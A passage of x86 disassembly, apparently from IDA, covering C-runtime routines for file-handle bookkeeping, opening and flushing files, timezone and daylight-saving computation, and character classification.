; sub_420C0D+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_420C0D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_420CA2(int, HANDLE hHandle)
sub_420CA2 proc near ; CODE XREF: sub_420E27+1F4�p
arg_0 = dword ptr 4
hHandle = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword ptr byte_445EDC+0D5A24h
push edi
jnb short loc_420D02
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:51B800h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_420D02
cmp dword ptr unk_43DD24, 1
push ebx
mov ebx, [esp+0Ch+hHandle]
jnz short loc_420CF8
sub eax, 0
jz short loc_420CEF
dec eax
jz short loc_420CEA
dec eax
jnz short loc_420CF8
push ebx
push 0FFFFFFF4h
jmp short loc_420CF2
; ---------------------------------------------------------------------------
loc_420CEA: ; CODE XREF: sub_420CA2+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_420CF2
; ---------------------------------------------------------------------------
loc_420CEF: ; CODE XREF: sub_420CA2+3B�j
push ebx ; hHandle
push 0FFFFFFF6h ; nStdHandle
loc_420CF2: ; CODE XREF: sub_420CA2+46�j
; sub_420CA2+4B�j
call SetStdHandle ; SetStdHandle
loc_420CF8: ; CODE XREF: sub_420CA2+36�j
; sub_420CA2+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_420D16
; ---------------------------------------------------------------------------
loc_420D02: ; CODE XREF: sub_420CA2+C�j
; sub_420CA2+28�j
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
or eax, 0FFFFFFFFh
loc_420D16: ; CODE XREF: sub_420CA2+5E�j
pop edi
pop esi
retn
sub_420CA2 endp
; =============== S U B R O U T I N E =======================================
sub_420D19 proc near ; CODE XREF: sub_41E466+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword ptr byte_445EDC+0D5A24h
push edi
jnb short loc_420D7C
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:51B800h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_420D7C
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_420D7C
cmp dword ptr unk_43DD24, 1
jnz short loc_420D72
xor eax, eax
sub ecx, eax
jz short loc_420D69
dec ecx
jz short loc_420D64
dec ecx
jnz short loc_420D72
push eax
push 0FFFFFFF4h
jmp short loc_420D6C
; ---------------------------------------------------------------------------
loc_420D64: ; CODE XREF: sub_420D19+41�j
push eax
push 0FFFFFFF5h
jmp short loc_420D6C
; ---------------------------------------------------------------------------
loc_420D69: ; CODE XREF: sub_420D19+3E�j
push eax ; hHandle
push 0FFFFFFF6h ; nStdHandle
loc_420D6C: ; CODE XREF: sub_420D19+49�j
; sub_420D19+4E�j
call SetStdHandle ; SetStdHandle
loc_420D72: ; CODE XREF: sub_420D19+38�j
; sub_420D19+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_420D90
; ---------------------------------------------------------------------------
loc_420D7C: ; CODE XREF: sub_420D19+C�j
; sub_420D19+2A�j ...
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
or eax, 0FFFFFFFFh
loc_420D90: ; CODE XREF: sub_420D19+61�j
pop edi
pop esi
retn
sub_420D19 endp
; =============== S U B R O U T I N E =======================================
sub_420D93 proc near ; CODE XREF: sub_41E466+32�p
; sub_41E466+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword ptr byte_445EDC+0D5A24h
jnb short loc_420DBB
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword ptr byte_445EDC+0D5924h[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_420DBB
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_420DBB: ; CODE XREF: sub_420D93+A�j
; sub_420D93+23�j
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
or eax, 0FFFFFFFFh
retn
sub_420D93 endp
; =============== S U B R O U T I N E =======================================
sub_420DD0 proc near ; CODE XREF: sub_41E544+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword ptr byte_445EDC+0D5A24h
jnb short loc_420E19
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword ptr byte_445EDC+0D5924h[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_420E19
push eax
call sub_420D93
pop ecx
push eax ; hFile
call FlushFileBuffers ; FlushFileBuffers
test eax, eax
jnz short loc_420E0E
call GetLastError
jmp short loc_420E10
; ---------------------------------------------------------------------------
loc_420E0E: ; CODE XREF: sub_420DD0+34�j
xor eax, eax
loc_420E10: ; CODE XREF: sub_420DD0+3C�j
test eax, eax
jz short locret_420E26
mov dword ptr byte_445EDC+0D43E8h, eax
loc_420E19: ; CODE XREF: sub_420DD0+A�j
; sub_420DD0+22�j
mov dword ptr byte_445EDC+0D43E4h, 9
or eax, 0FFFFFFFFh
locret_420E26: ; CODE XREF: sub_420DD0+42�j
retn
sub_420DD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420E27 proc near ; CODE XREF: sub_41EB65+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_420E4D
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_420E58
; ---------------------------------------------------------------------------
loc_420E4D: ; CODE XREF: sub_420E27+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_420E58: ; CODE XREF: sub_420E27+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_420E72
test ch, 40h
jnz short loc_420E6E
cmp dword ptr byte_445EDC+0D46C8h, eax
jz short loc_420E72
loc_420E6E: ; CODE XREF: sub_420E27+3D�j
or [ebp+var_1], 80h
loc_420E72: ; CODE XREF: sub_420E27+38�j
; sub_420E27+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_420EAA
dec eax
jz short loc_420EA1
dec eax
jz short loc_420E98
loc_420E83: ; CODE XREF: sub_420E27+9F�j
; sub_420E27+E8�j ...
mov dword ptr byte_445EDC+0D43E4h, 16h
mov dword ptr byte_445EDC+0D43E8h, ebx
jmp loc_4210BD
; ---------------------------------------------------------------------------
loc_420E98: ; CODE XREF: sub_420E27+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_420EB1
; ---------------------------------------------------------------------------
loc_420EA1: ; CODE XREF: sub_420E27+57�j
mov [ebp+var_C], 40000000h
jmp short loc_420EB1
; ---------------------------------------------------------------------------
loc_420EAA: ; CODE XREF: sub_420E27+54�j
mov [ebp+var_C], 80000000h
loc_420EB1: ; CODE XREF: sub_420E27+78�j
; sub_420E27+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_420EDF
cmp eax, 20h
jz short loc_420ED6
cmp eax, 30h
jz short loc_420ECD
cmp eax, 40h
jnz short loc_420E83
mov [ebp+var_10], esi
jmp short loc_420EE2
; ---------------------------------------------------------------------------
loc_420ECD: ; CODE XREF: sub_420E27+9A�j
mov [ebp+var_10], 2
jmp short loc_420EE2
; ---------------------------------------------------------------------------
loc_420ED6: ; CODE XREF: sub_420E27+95�j
mov [ebp+var_10], 1
jmp short loc_420EE2
; ---------------------------------------------------------------------------
loc_420EDF: ; CODE XREF: sub_420E27+90�j
mov [ebp+var_10], ebx
loc_420EE2: ; CODE XREF: sub_420E27+A4�j
; sub_420E27+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_420F2C
jz short loc_420F27
cmp ecx, ebx
jz short loc_420F27
cmp ecx, edi
jz short loc_420F1E
cmp ecx, 200h
jz short loc_420F45
cmp ecx, 300h
jnz loc_420E83
mov [ebp+var_8], 2
jmp short loc_420F55
; ---------------------------------------------------------------------------
loc_420F1E: ; CODE XREF: sub_420E27+D8�j
mov [ebp+var_8], 4
jmp short loc_420F55
; ---------------------------------------------------------------------------
loc_420F27: ; CODE XREF: sub_420E27+D0�j
; sub_420E27+D4�j
mov [ebp+var_8], esi
jmp short loc_420F55
; ---------------------------------------------------------------------------
loc_420F2C: ; CODE XREF: sub_420E27+CE�j
cmp ecx, 500h
jz short loc_420F4E
cmp ecx, 600h
jz short loc_420F45
cmp ecx, edx
jz short loc_420F4E
jmp loc_420E83
; ---------------------------------------------------------------------------
loc_420F45: ; CODE XREF: sub_420E27+E0�j
; sub_420E27+113�j
mov [ebp+var_8], 5
jmp short loc_420F55
; ---------------------------------------------------------------------------
loc_420F4E: ; CODE XREF: sub_420E27+10B�j
; sub_420E27+117�j
mov [ebp+var_8], 1
loc_420F55: ; CODE XREF: sub_420E27+F5�j
; sub_420E27+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_420F74
mov ecx, dword ptr byte_445EDC+0D43ECh
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_420F74
push 1
pop esi
loc_420F74: ; CODE XREF: sub_420E27+138�j
; sub_420E27+148�j
test al, 40h
jz short loc_420F82
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_420F82: ; CODE XREF: sub_420E27+14F�j
test ah, 10h
jz short loc_420F89
or esi, edi
loc_420F89: ; CODE XREF: sub_420E27+15E�j
test al, 20h
jz short loc_420F95
or esi, 8000000h
jmp short loc_420F9F
; ---------------------------------------------------------------------------
loc_420F95: ; CODE XREF: sub_420E27+164�j
test al, 10h
jz short loc_420F9F
or esi, 10000000h
loc_420F9F: ; CODE XREF: sub_420E27+16C�j
; sub_420E27+170�j
call sub_420C0D
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_420FC0
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 18h
jmp short loc_420FFE
; ---------------------------------------------------------------------------
loc_420FC0: ; CODE XREF: sub_420E27+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call dword ptr byte_424084
mov esi, eax
cmp esi, edi
jz short loc_420FF1
push esi ; hFile
call GetFileType ; GetFileType
test eax, eax
jnz short loc_421005
push esi
call dword ptr byte_424074+4
loc_420FF1: ; CODE XREF: sub_420E27+1B6�j
call GetLastError
push eax
call sub_41F64A
pop ecx
loc_420FFE: ; CODE XREF: sub_420E27+197�j
mov eax, edi
jmp loc_4210DB
; ---------------------------------------------------------------------------
loc_421005: ; CODE XREF: sub_420E27+1C1�j
cmp eax, 2
jnz short loc_421010
or [ebp+var_1], 40h
jmp short loc_421019
; ---------------------------------------------------------------------------
loc_421010: ; CODE XREF: sub_420E27+1E1�j
cmp eax, 3
jnz short loc_421019
or [ebp+var_1], 8
loc_421019: ; CODE XREF: sub_420E27+1E7�j
; sub_420E27+1EC�j
push esi ; hHandle
push ebx ; int
call sub_420CA2
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:51B800h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_4210C2
test al, 80h
jz short loc_4210C2
test byte ptr [ebp+arg_4], 2
jz short loc_4210C2
push 2
push 0FFFFFFFFh
push ebx
call sub_41EACB
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_421077
cmp dword ptr byte_445EDC+0D43E8h, 83h
jz short loc_4210C2
jmp short loc_4210B6
; ---------------------------------------------------------------------------
loc_421077: ; CODE XREF: sub_420E27+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41E72A
add esp, 0Ch
test eax, eax
jnz short loc_4210A4
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_4210A4
push [ebp+var_10]
push ebx
call sub_42228A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4210B6
loc_4210A4: ; CODE XREF: sub_420E27+265�j
; sub_420E27+26B�j
push 0
push 0
push ebx
call sub_41EACB
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_4210C2
loc_4210B6: ; CODE XREF: sub_420E27+24E�j
; sub_420E27+27B�j
push ebx
call sub_41E466
pop ecx
loc_4210BD: ; CODE XREF: sub_420E27+6C�j
or eax, 0FFFFFFFFh
jmp short loc_4210DB
; ---------------------------------------------------------------------------
loc_4210C2: ; CODE XREF: sub_420E27+221�j
; sub_420E27+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4210D9
test byte ptr [ebp+arg_4], 8
jz short loc_4210D9
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_4210D9: ; CODE XREF: sub_420E27+29F�j
; sub_420E27+2A5�j
mov eax, ebx
loc_4210DB: ; CODE XREF: sub_420E27+1D9�j
; sub_420E27+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_420E27 endp
; =============== S U B R O U T I N E =======================================
sub_4210E0 proc near ; CODE XREF: sub_41ED4D:loc_41ED8C�p
cmp dword ptr byte_445EDC+0D46A4h, 0
jnz short locret_4210F4
call sub_4210F5
inc dword ptr byte_445EDC+0D46A4h
locret_4210F4: ; CODE XREF: sub_4210E0+7�j
retn
sub_4210E0 endp
; =============== S U B R O U T I N E =======================================
sub_4210F5 proc near ; CODE XREF: sub_4210E0+9�p
UsedDefaultChar = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
xor ebp, ebp
or ebx, 0FFFFFFFFh
push offset String2 ; lpString2
xor edi, edi
mov dword ptr byte_445EDC+0D45ECh, ebp
mov dword ptr unk_4407A8, ebx
mov dword ptr unk_440798, ebx
call sub_4223D0
mov esi, eax
pop ecx
cmp esi, ebp
jnz loc_42121E
push (offset byte_445EDC+0D45F4h) ; lpTimeZoneInformation
call GetTimeZoneInformation ; GetTimeZoneInformation
cmp eax, ebx
jz loc_42134D
mov eax, dword ptr byte_445EDC+0D45F4h
mov ecx, dword ptr byte_445EDC+0D4648h
imul eax, 3Ch
cmp word ptr byte_445EDC+0D463Ah, bp
push 1
pop edx
mov dword ptr unk_440700, eax
mov dword ptr byte_445EDC+0D45ECh, edx
jz short loc_42116C
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword ptr unk_440700, eax
loc_42116C: ; CODE XREF: sub_4210F5+69�j
cmp word ptr byte_445EDC+0D468Eh, bp
jz short loc_421190
mov eax, dword ptr byte_445EDC+0D469Ch
cmp eax, ebp
jz short loc_421190
sub eax, ecx
mov dword ptr unk_440704, edx
imul eax, 3Ch
mov dword ptr unk_440708, eax
jmp short loc_42119C
; ---------------------------------------------------------------------------
loc_421190: ; CODE XREF: sub_4210F5+7E�j
; sub_4210F5+87�j
mov dword ptr unk_440704, ebp
mov dword ptr unk_440708, ebp
loc_42119C: ; CODE XREF: sub_4210F5+99�j
lea eax, [esp+14h+UsedDefaultChar]
mov esi, WideCharToMultiByte
push eax ; lpUsedDefaultChar
push ebp ; lpDefaultChar
push 3Fh ; cbMultiByte
mov edi, 220h
push lpMultiByteStr ; lpMultiByteStr
push ebx ; cchWideChar
push (offset byte_445EDC+0D45F8h) ; lpWideCharStr
push edi ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call esi ; WideCharToMultiByte
test eax, eax
jz short loc_4211D9
cmp [esp+14h+UsedDefaultChar], ebp
jnz short loc_4211D9
mov eax, lpMultiByteStr
and byte ptr [eax+3Fh], 0
jmp short loc_4211E1
; ---------------------------------------------------------------------------
loc_4211D9: ; CODE XREF: sub_4210F5+D1�j
; sub_4210F5+D7�j
mov eax, lpMultiByteStr
and byte ptr [eax], 0
loc_4211E1: ; CODE XREF: sub_4210F5+E2�j
lea eax, [esp+14h+UsedDefaultChar]
push eax ; lpUsedDefaultChar
push ebp ; lpDefaultChar
push 3Fh ; cbMultiByte
push off_440790 ; lpMultiByteStr
push ebx ; cchWideChar
push (offset byte_445EDC+0D464Ch) ; lpWideCharStr
push edi ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call esi ; WideCharToMultiByte
test eax, eax
jz loc_421345
cmp [esp+14h+UsedDefaultChar], ebp
jnz loc_421345
mov eax, off_440790
and byte ptr [eax+3Fh], 0
jmp loc_42134D
; ---------------------------------------------------------------------------
loc_42121E: ; CODE XREF: sub_4210F5+2D�j
cmp byte ptr [esi], 0
jz loc_42134D
mov eax, dword ptr byte_445EDC+0D46A0h
cmp eax, ebp
jz short loc_421241
push eax
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_42134D
loc_421241: ; CODE XREF: sub_4210F5+139�j
push dword ptr byte_445EDC+0D46A0h ; lpMem
call sub_418227
push esi
call sub_4180D0
inc eax
push eax
call sub_418175
add esp, 0Ch
cmp eax, ebp
mov dword ptr byte_445EDC+0D46A0h, eax
jz loc_42134D
push esi
push eax
call sub_417FE0
push 3
push esi
push lpMultiByteStr
call sub_419300
mov eax, lpMultiByteStr
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_421296
push 1
inc esi
pop edi
loc_421296: ; CODE XREF: sub_4210F5+19B�j
push esi
call sub_417E44
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword ptr unk_440700, ecx
loc_4212AD: ; CODE XREF: sub_4210F5+1C7�j
mov al, [esi]
cmp al, 2Bh
jz short loc_4212BB
cmp al, bl
jl short loc_4212BE
cmp al, 39h
jg short loc_4212BE
loc_4212BB: ; CODE XREF: sub_4210F5+1BC�j
inc esi
jmp short loc_4212AD
; ---------------------------------------------------------------------------
loc_4212BE: ; CODE XREF: sub_4210F5+1C0�j
; sub_4210F5+1C4�j
cmp byte ptr [esi], 3Ah
jnz short loc_421311
inc esi
push esi
call sub_417E44
imul eax, 3Ch
pop ecx
mov ecx, dword ptr unk_440700
add ecx, eax
mov dword ptr unk_440700, ecx
loc_4212DC: ; CODE XREF: sub_4210F5+1F2�j
mov al, [esi]
cmp al, bl
jl short loc_4212E9
cmp al, 39h
jg short loc_4212E9
inc esi
jmp short loc_4212DC
; ---------------------------------------------------------------------------
loc_4212E9: ; CODE XREF: sub_4210F5+1EB�j
; sub_4210F5+1EF�j
cmp byte ptr [esi], 3Ah
jnz short loc_421311
inc esi
push esi
call sub_417E44
pop ecx
mov ecx, dword ptr unk_440700
add ecx, eax
mov dword ptr unk_440700, ecx
loc_421304: ; CODE XREF: sub_4210F5+21A�j
mov al, [esi]
cmp al, bl
jl short loc_421311
cmp al, 39h
jg short loc_421311
inc esi
jmp short loc_421304
; ---------------------------------------------------------------------------
loc_421311: ; CODE XREF: sub_4210F5+1CC�j
; sub_4210F5+1F7�j ...
cmp edi, ebp
jz short loc_42131D
neg ecx
mov dword ptr unk_440700, ecx
loc_42131D: ; CODE XREF: sub_4210F5+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov dword ptr unk_440704, eax
jz short loc_421345
push 3
push esi
push off_440790
call sub_419300
mov eax, off_440790
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_42134D
; ---------------------------------------------------------------------------
loc_421345: ; CODE XREF: sub_4210F5+10B�j
; sub_4210F5+115�j ...
mov eax, off_440790
and byte ptr [eax], 0
loc_42134D: ; CODE XREF: sub_4210F5+40�j
; sub_4210F5+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_4210F5 endp
; =============== S U B R O U T I N E =======================================
sub_421353 proc near ; CODE XREF: sub_41ED4D+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp dword ptr unk_440704, edi
jnz short loc_421367
loc_421360: ; CODE XREF: sub_421353+148�j
; sub_421353+150�j ...
xor eax, eax
jmp loc_4214B3
; ---------------------------------------------------------------------------
loc_421367: ; CODE XREF: sub_421353+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, dword ptr unk_440798
jnz short loc_421385
cmp eax, dword ptr unk_4407A8
jz loc_421487
loc_421385: ; CODE XREF: sub_421353+24�j
cmp dword ptr byte_445EDC+0D45ECh, edi
jz loc_42145D
movzx ecx, word ptr byte_445EDC+0D469Ah
push ecx
cmp word ptr byte_445EDC+0D468Ch, di
movzx ecx, word ptr byte_445EDC+0D4698h
push ecx
movzx ecx, word ptr byte_445EDC+0D4696h
push ecx
movzx ecx, word ptr byte_445EDC+0D4694h
push ecx
jnz short loc_4213D7
movzx ecx, word ptr byte_445EDC+0D4690h
push edi
push ecx
movzx ecx, word ptr byte_445EDC+0D4692h
push ecx
movzx ecx, word ptr byte_445EDC+0D468Eh
push ecx
push eax
push ebx
jmp short loc_4213EB
; ---------------------------------------------------------------------------
loc_4213D7: ; CODE XREF: sub_421353+65�j
movzx ecx, word ptr byte_445EDC+0D4692h
push ecx
push edi
movzx ecx, word ptr byte_445EDC+0D468Eh
push edi
push ecx
push eax
push edi
loc_4213EB: ; CODE XREF: sub_421353+82�j
push ebx
call sub_4214FF
movzx eax, word ptr byte_445EDC+0D4646h
add esp, 2Ch
cmp word ptr byte_445EDC+0D4638h, di
push eax
movzx eax, word ptr byte_445EDC+0D4644h
push eax
movzx eax, word ptr byte_445EDC+0D4642h
push eax
movzx eax, word ptr byte_445EDC+0D4640h
push eax
jnz short loc_421445
movzx eax, word ptr byte_445EDC+0D463Ch
push edi
push eax
movzx eax, word ptr byte_445EDC+0D463Eh
push eax
movzx eax, word ptr byte_445EDC+0D463Ah
push eax
push dword ptr [esi+14h]
push ebx
loc_42143A: ; CODE XREF: sub_421353+108�j
push edi
call sub_4214FF
add esp, 2Ch
jmp short loc_421487
; ---------------------------------------------------------------------------
loc_421445: ; CODE XREF: sub_421353+C8�j
movzx eax, word ptr byte_445EDC+0D463Eh
push eax
push edi
movzx eax, word ptr byte_445EDC+0D463Ah
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_42143A
; ---------------------------------------------------------------------------
loc_42145D: ; CODE XREF: sub_421353+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_4214FF
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_4214FF
add esp, 58h
loc_421487: ; CODE XREF: sub_421353+2C�j
; sub_421353+F0�j
mov edx, dword ptr unk_44079C
mov eax, dword ptr unk_4407AC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_4214B7
cmp ecx, edx
jl loc_421360
cmp ecx, eax
jg loc_421360
cmp ecx, edx
jle short loc_4214CB
cmp ecx, eax
jge short loc_4214CB
loc_4214B1: ; CODE XREF: sub_421353+166�j
; sub_421353+16A�j
mov eax, ebx
loc_4214B3: ; CODE XREF: sub_421353+F�j
; sub_421353+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4214B7: ; CODE XREF: sub_421353+144�j
cmp ecx, eax
jl short loc_4214B1
cmp ecx, edx
jg short loc_4214B1
cmp ecx, eax
jle short loc_4214CB
cmp ecx, edx
jl loc_421360
loc_4214CB: ; CODE XREF: sub_421353+158�j
; sub_421353+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_4214F2
xor ecx, ecx
cmp eax, dword ptr unk_4407A0
setnl cl
loc_4214EE: ; CODE XREF: sub_421353+1AA�j
mov eax, ecx
jmp short loc_4214B3
; ---------------------------------------------------------------------------
loc_4214F2: ; CODE XREF: sub_421353+18E�j
xor ecx, ecx
cmp eax, dword ptr unk_4407B0
setl cl
jmp short loc_4214EE
sub_421353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4214FF proc near ; CODE XREF: sub_421353+99�p
; sub_421353+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_42159A
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_42152A
shl esi, 2
mov eax, [esi+4407B0h]
jmp short loc_421533
; ---------------------------------------------------------------------------
loc_42152A: ; CODE XREF: sub_4214FF+1E�j
shl esi, 2
mov eax, [esi+4407E4h]
loc_421533: ; CODE XREF: sub_4214FF+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_42156D
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_421577
; ---------------------------------------------------------------------------
loc_42156D: ; CODE XREF: sub_4214FF+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_421577: ; CODE XREF: sub_4214FF+6C�j
cmp [ebp+arg_10], 5
jnz short loc_4215B5
cmp [ebp+arg_8], 0
jnz short loc_42158B
mov esi, [esi+4407B4h]
jmp short loc_421591
; ---------------------------------------------------------------------------
loc_42158B: ; CODE XREF: sub_4214FF+82�j
mov esi, [esi+4407E8h]
loc_421591: ; CODE XREF: sub_4214FF+8A�j
cmp ecx, esi
jle short loc_4215B5
sub ecx, 7
jmp short loc_4215B5
; ---------------------------------------------------------------------------
loc_42159A: ; CODE XREF: sub_4214FF+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_4215AB
mov ecx, dword ptr unk_4407B0[eax*4]
jmp short loc_4215B2
; ---------------------------------------------------------------------------
loc_4215AB: ; CODE XREF: sub_4214FF+A1�j
mov ecx, dword ptr unk_4407E4[eax*4]
loc_4215B2: ; CODE XREF: sub_4214FF+AA�j
add ecx, [ebp+arg_18]
loc_4215B5: ; CODE XREF: sub_4214FF+7C�j
; sub_4214FF+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_4215E6
mov eax, [ebp+arg_1C]
mov dword ptr unk_44079C, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov dword ptr unk_440798, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword ptr unk_4407A0, eax
jmp short loc_42163B
; ---------------------------------------------------------------------------
loc_4215E6: ; CODE XREF: sub_4214FF+BA�j
mov eax, [ebp+arg_1C]
mov dword ptr unk_4407AC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, dword ptr unk_440708
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov dword ptr unk_4407B0, eax
jns short loc_42161E
add eax, 5265C00h
dec ecx
mov dword ptr unk_4407B0, eax
jmp short loc_42162F
; ---------------------------------------------------------------------------
loc_42161E: ; CODE XREF: sub_4214FF+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_421635
sub eax, edx
inc ecx
mov dword ptr unk_4407B0, eax
loc_42162F: ; CODE XREF: sub_4214FF+11D�j
mov dword ptr unk_4407AC, ecx
loc_421635: ; CODE XREF: sub_4214FF+126�j
mov dword ptr unk_4407A8, ebx
loc_42163B: ; CODE XREF: sub_4214FF+E5�j
pop esi
pop ebx
pop ebp
retn
sub_4214FF endp
; =============== S U B R O U T I N E =======================================
sub_42163F proc near ; CODE XREF: sub_41F8FF+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_421650
add esp, 0Ch
retn
sub_42163F endp
; =============== S U B R O U T I N E =======================================
sub_421650 proc near ; CODE XREF: sub_42163F+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test [eax+51B6E1h], cl
jnz short loc_42167D
cmp [esp+arg_4], 0
jz short loc_421676
movzx eax, word ptr unk_43DD3A[eax*2]
and eax, [esp+arg_4]
jmp short loc_421678
; ---------------------------------------------------------------------------
loc_421676: ; CODE XREF: sub_421650+16�j
xor eax, eax
loc_421678: ; CODE XREF: sub_421650+24�j
test eax, eax
jnz short loc_42167D
retn
; ---------------------------------------------------------------------------
loc_42167D: ; CODE XREF: sub_421650+F�j
; sub_421650+2A�j
push 1
pop eax
retn
